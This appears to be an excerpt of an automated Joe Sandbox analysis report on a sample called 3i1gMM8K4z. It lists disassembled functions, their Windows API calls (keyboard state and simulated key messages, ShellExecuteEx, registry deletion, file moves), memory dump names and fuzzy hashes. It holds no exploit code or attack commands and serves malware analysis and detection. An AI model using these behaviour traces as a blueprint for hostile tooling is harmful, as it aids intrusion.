                                                                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00F471DE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 256516436-0
                                                                                                                            • Opcode ID: 3b75bd8f21b05aae3b63eece49b09786015490ec5bb32ebc567b3d68197ad55f
                                                                                                                            • Instruction ID: 25b4ad714ed8522265a71e808618f65a34c289445855a09b9263f3e47ad24ea1
                                                                                                                            • Opcode Fuzzy Hash: 3b75bd8f21b05aae3b63eece49b09786015490ec5bb32ebc567b3d68197ad55f
                                                                                                                            • Instruction Fuzzy Hash: C6317031900209EBDB00EFA4DD85AAEBB78FF45710F1441A5FD04AB296DB74DE14EB60
                                                                                                                            Function 00F661D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00F661EB
                                                                                                                            • GetDC.USER32(00000000), ref: 00F661F3
                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F661FE
                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00F6620A
                                                                                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00F66246
                                                                                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00F66257
                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00F6902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00F66291
                                                                                                                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00F662B1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3864802216-0
                                                                                                                            • Opcode ID: 129121a77d6e6a764808b79385ee27ec876d307bccef093ed1b62c8e7c102c3f
                                                                                                                            • Instruction ID: ae45f819d7afe2d8d25a32682e8d0906471aa9f07560afbddebbf210b6214905
                                                                                                                            • Opcode Fuzzy Hash: 129121a77d6e6a764808b79385ee27ec876d307bccef093ed1b62c8e7c102c3f
                                                                                                                            • Instruction Fuzzy Hash: C6317F72101214BFEF118F50DC8AFEA3BA9EF4A765F044065FE18DA1A2C6B59C41DB70
                                                                                                                            Function 00F3BBAF Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memcmp
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2931989736-0
                                                                                                                            • Opcode ID: 74c9d4ec06afb4537e47f710aa6fdfaf16d9541cf8f220b2e38ad98d5cbfebfe
                                                                                                                            • Instruction ID: e050f3aad48546120d3f4fa85aba4f374a734ddd26991e973035d7d392efc583
                                                                                                                            • Opcode Fuzzy Hash: 74c9d4ec06afb4537e47f710aa6fdfaf16d9541cf8f220b2e38ad98d5cbfebfe
                                                                                                                            • Instruction Fuzzy Hash: DD21FC62A0120677E615AB119D62FFFB35CAE513B8F044015FF0856683EF18DF11B1B2
                                                                                                                            Function 00F4EB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE9837: __itow.LIBCMT ref: 00EE9862
                                                                                                                              • Part of subcall function 00EE9837: __swprintf.LIBCMT ref: 00EE98AC
                                                                                                                              • Part of subcall function 00EFFC86: _wcscpy.LIBCMT ref: 00EFFCA9
                                                                                                                            • _wcstok.LIBCMT ref: 00F4EC94
                                                                                                                            • _wcscpy.LIBCMT ref: 00F4ED23
                                                                                                                            • _memset.LIBCMT ref: 00F4ED56
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                            • String ID: X
                                                                                                                            • API String ID: 774024439-3081909835
                                                                                                                            • Opcode ID: 0d443d17ee54083f13a3012e9cd5b30fa353a0e3e4dc525f1d132b1d5245d9ef
                                                                                                                            • Instruction ID: d2fa9533e9c5ba579f2d42a80a4bff66a0d95c9b0e63fce09e7c93b484b3dfb1
                                                                                                                            • Opcode Fuzzy Hash: 0d443d17ee54083f13a3012e9cd5b30fa353a0e3e4dc525f1d132b1d5245d9ef
                                                                                                                            • Instruction Fuzzy Hash: A9C1A1719083459FC754EF24C881A5ABBE4FF85324F10492DFD9AAB2A2DB30EC45DB42
                                                                                                                            Function 00EE1424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 713adbb93dab77a3f627e126444cf7cf336c9ad4bfd9086fc216e7475ae549f1
                                                                                                                            • Instruction ID: 0c7ae4907b8b82c45a5464b01918f11271924c1895220d37f0363f3896e029aa
                                                                                                                            • Opcode Fuzzy Hash: 713adbb93dab77a3f627e126444cf7cf336c9ad4bfd9086fc216e7475ae549f1
                                                                                                                            • Instruction Fuzzy Hash: EA716D3090015DEFCB148F99CC48EFEBB75FF85324F148199F925AA291D730AA91DB60
                                                                                                                            Function 00F56B76 Relevance: 10.7, APIs: 7, Instructions: 212COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 1c2545d38c3857882cd0f6f405edea4139bcf9662d3409bf452c886b3517a2d3
                                                                                                                            • Instruction ID: 5c687ea087f93ccd4f71bec22afd58d8f83200d8434c2fe43304f016cd5e6441
                                                                                                                            • Opcode Fuzzy Hash: 1c2545d38c3857882cd0f6f405edea4139bcf9662d3409bf452c886b3517a2d3
                                                                                                                            • Instruction Fuzzy Hash: 8561A072608344ABC710EB25DC81F6FB7F8AF84724F504928FA65A72A2DB709D09D752
                                                                                                                            Function 00F6B351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • IsWindow.USER32(01205408), ref: 00F6B3EB
                                                                                                                            • IsWindowEnabled.USER32(01205408), ref: 00F6B3F7
                                                                                                                            • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00F6B4DB
                                                                                                                            • SendMessageW.USER32(01205408,000000B0,?,?), ref: 00F6B512
                                                                                                                            • IsDlgButtonChecked.USER32(?,?), ref: 00F6B54F
                                                                                                                            • GetWindowLongW.USER32(01205408,000000EC), ref: 00F6B571
                                                                                                                            • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00F6B589
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4072528602-0
                                                                                                                            • Opcode ID: 55aeb66516c00524e01766c6e6412d2dad25fbe28dbdadf7931e6e6b902ea604
                                                                                                                            • Instruction ID: b85b22a4742cbb63dc5abb0a9963fd30bd61a838b3f94685b5fd9ac41194a84f
                                                                                                                            • Opcode Fuzzy Hash: 55aeb66516c00524e01766c6e6412d2dad25fbe28dbdadf7931e6e6b902ea604
                                                                                                                            • Instruction Fuzzy Hash: 8C718074A04204AFDB20DF54C895FBA7BB5EF0A320F144159E956D7362CB72AD81EB50
                                                                                                                            Function 00F5F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00F5F448
                                                                                                                            • _memset.LIBCMT ref: 00F5F511
                                                                                                                            • ShellExecuteExW.SHELL32(?), ref: 00F5F556
                                                                                                                              • Part of subcall function 00EE9837: __itow.LIBCMT ref: 00EE9862
                                                                                                                              • Part of subcall function 00EE9837: __swprintf.LIBCMT ref: 00EE98AC
                                                                                                                              • Part of subcall function 00EFFC86: _wcscpy.LIBCMT ref: 00EFFCA9
                                                                                                                            • GetProcessId.KERNEL32(00000000), ref: 00F5F5CD
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00F5F5FC
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 3522835683-2766056989
                                                                                                                            • Opcode ID: c02db7dc7cd9c31eed15fc999dd26c64d06d8801716a87ff27beebcd6c8be292
                                                                                                                            • Instruction ID: 8dee85835aef3cffcaeb6663b593d05cc8a97c8f3d78350e3d9552a38e3d9c26
                                                                                                                            • Opcode Fuzzy Hash: c02db7dc7cd9c31eed15fc999dd26c64d06d8801716a87ff27beebcd6c8be292
                                                                                                                            • Instruction Fuzzy Hash: C961B075A006199FCF04EF65C8819AEBBF5FF48320F1480A9E955BB361CB30AD49DB94
                                                                                                                            Function 00F40F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetParent.USER32(?), ref: 00F40F8C
                                                                                                                            • GetKeyboardState.USER32(?), ref: 00F40FA1
                                                                                                                            • SetKeyboardState.USER32(?), ref: 00F41002
                                                                                                                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 00F41030
                                                                                                                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 00F4104F
                                                                                                                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 00F41095
                                                                                                                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00F410B8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 87235514-0
                                                                                                                            • Opcode ID: 205f0e62a905321c796a216c4520b35bab4833edcb0e2ec5b7f1ccc1563a1db0
                                                                                                                            • Instruction ID: 154c8930cff958a9b5189940cc5e0a7710e7352e4449b7455c08cf6f91741605
                                                                                                                            • Opcode Fuzzy Hash: 205f0e62a905321c796a216c4520b35bab4833edcb0e2ec5b7f1ccc1563a1db0
                                                                                                                            • Instruction Fuzzy Hash: BE51E4609047D53DFB3643388C05BB6BFA96B06324F088589EAD5868D3D6E9DCC8F751
                                                                                                                            Function 00F40D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetParent.USER32(00000000), ref: 00F40DA5
                                                                                                                            • GetKeyboardState.USER32(?), ref: 00F40DBA
                                                                                                                            • SetKeyboardState.USER32(?), ref: 00F40E1B
                                                                                                                            • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00F40E47
                                                                                                                            • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00F40E64
                                                                                                                            • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00F40EA8
                                                                                                                            • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00F40EC9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 87235514-0
                                                                                                                            • Opcode ID: d705bca4460591bbea47646ef3cf108bf99cb4e61a328b288e104e583470140e
                                                                                                                            • Instruction ID: 240523e13bb48f8c56b4935040b9687c18760ddd02274ac0722bbd6c6475977a
                                                                                                                            • Opcode Fuzzy Hash: d705bca4460591bbea47646ef3cf108bf99cb4e61a328b288e104e583470140e
                                                                                                                            • Instruction Fuzzy Hash: 7F51F8A0D447D53DFB3243748C45B7A7EA96B06320F084899EAD4864C2DBB5EC98F750
                                                                                                                            Function 00F455FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _wcsncpy$LocalTime
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2945705084-0
                                                                                                                            • Opcode ID: ea800d9cb14511c0d3228e13db89258a03563080249e059a86f75303e8112cb4
                                                                                                                            • Instruction ID: 38630d633c04fde2e3a14d30b9f217dbf0c8b4a8737eefa2388b54527ea9ec95
                                                                                                                            • Opcode Fuzzy Hash: ea800d9cb14511c0d3228e13db89258a03563080249e059a86f75303e8112cb4
                                                                                                                            • Instruction Fuzzy Hash: 9E41C7A5C10218B6CB51FBB48C469CFB7BC9F04310F504466E905E3162EB38B345E7E6
                                                                                                                            Function 00F43671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00F4466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F43697,?), ref: 00F4468B
                                                                                                                              • Part of subcall function 00F4466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F43697,?), ref: 00F446A4
                                                                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 00F436B7
                                                                                                                            • _wcscmp.LIBCMT ref: 00F436D3
                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 00F436EB
                                                                                                                            • _wcscat.LIBCMT ref: 00F43733
                                                                                                                            • SHFileOperationW.SHELL32(?), ref: 00F4379F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                                                                            • String ID: \*.*
                                                                                                                            • API String ID: 1377345388-1173974218
                                                                                                                            • Opcode ID: a9d5d1f320ed291d658468473f269e9fb38f0c05e219c45bcfeb61c5136b3a72
                                                                                                                            • Instruction ID: 3945d01e81ae53a2095c7585f4f517f92f9efbd5f42824672c0fbf7ec59575e6
                                                                                                                            • Opcode Fuzzy Hash: a9d5d1f320ed291d658468473f269e9fb38f0c05e219c45bcfeb61c5136b3a72
                                                                                                                            • Instruction Fuzzy Hash: 4741A57150C349AEC751EF64D845ADF7BE8AF89390F00082EF899C3251EA38D689D752
                                                                                                                            Function 00F67291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00F672AA
                                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F67351
                                                                                                                            • IsMenu.USER32(?), ref: 00F67369
                                                                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F673B1
                                                                                                                            • DrawMenuBar.USER32 ref: 00F673C4
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                                            • String ID: 0
                                                                                                                            • API String ID: 3866635326-4108050209
                                                                                                                            • Opcode ID: 222f47549b4f493ef51e528813e09da358cb2bd33445c92de97e78bc976981d1
                                                                                                                            • Instruction ID: 7f6c947cce89e7659750787b5ae42a048991ec6f86d1497f8521fc54947f3ab4
                                                                                                                            • Opcode Fuzzy Hash: 222f47549b4f493ef51e528813e09da358cb2bd33445c92de97e78bc976981d1
                                                                                                                            • Instruction Fuzzy Hash: 28412675A04308AFDB20EF50D886A9ABBF8FB05324F149529FD15A7350D730AD54EF60
                                                                                                                            Function 00F60FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00F60FD4
                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F60FFE
                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00F610B5
                                                                                                                              • Part of subcall function 00F60FA5: RegCloseKey.ADVAPI32(?), ref: 00F6101B
                                                                                                                              • Part of subcall function 00F60FA5: FreeLibrary.KERNEL32(?), ref: 00F6106D
                                                                                                                              • Part of subcall function 00F60FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00F61090
                                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00F61058
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 395352322-0
                                                                                                                            • Opcode ID: dec304bc4d7bf4c2b989618e2b151f4a70cc14fc498ec8677a88359000c255ff
                                                                                                                            • Instruction ID: 3d0164ec31a33ddc128bcc1a5d6bc184c5afc53e4fcc5445ff076d33db05d5cf
                                                                                                                            • Opcode Fuzzy Hash: dec304bc4d7bf4c2b989618e2b151f4a70cc14fc498ec8677a88359000c255ff
